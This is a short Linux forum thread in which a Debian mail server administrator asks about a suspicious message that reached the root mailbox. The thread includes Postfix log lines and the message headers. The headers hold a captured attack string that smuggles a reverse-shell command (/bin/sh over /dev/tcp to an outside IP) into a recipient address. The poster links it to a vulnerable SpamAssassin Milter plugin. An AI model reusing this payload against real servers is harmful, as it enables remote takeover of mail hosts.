Find the answer to your Linux question:
Results 1 to 3 of 3
Hello, I adminster a new production mail server under Debian GNU/Linux 5.0 lenny. The other day I installed and configured Postfix and Dovecot, with no spam filtering or virus detection ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Apr 2008
    Location
    Catalonia
    Posts
    35

    [SOLVED] Debian mail server root mailbox received a strange message


    Hello,

    I adminster a new production mail server under Debian GNU/Linux 5.0 lenny. The other day I installed and configured Postfix and Dovecot, with no spam filtering or virus detection tools or complements.

    Today I noticed that the root mailbox has received a message from blue@dick.com. Is this some vulnerability? I'm not sure whether this represents a security problem or not.

    /var/log/mail.log:

    Code:
    Feb 15 11:16:10 postfix/smtpd[31314]: connect from b202.blue.fastwebserver.de[62.141.42.202]
    Feb 15 11:16:12 postfix/smtpd[31314]: 9AB3E11104B9: client=b202.blue.fastwebserver.de[62.141.42.202]
    Feb 15 11:16:12 postfix/qmgr[30491]: 9AB3E11104B9: from=<blue@dick.com>, size=405, nrcpt=1 (queue active)
    Feb 15 11:16:12 postfix/smtpd[31314]: disconnect from b202.blue.fastwebserver.de[62.141.42.202]
    Thank you!!
    Last edited by jordi; 02-16-2011 at 03:48 PM.

  2. #2
    Just Joined!
    Join Date
    Apr 2008
    Location
    Catalonia
    Posts
    35
    Here is the part of the expanded header:

    Code:
    X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
    Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"@machine.example.com

  3. #3
    Just Joined!
    Join Date
    Apr 2008
    Location
    Catalonia
    Posts
    35
    It seems that only a certain version of SpamAssassin Milter Plugin is compromised.

  4. $spacer_open
    $spacer_close

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •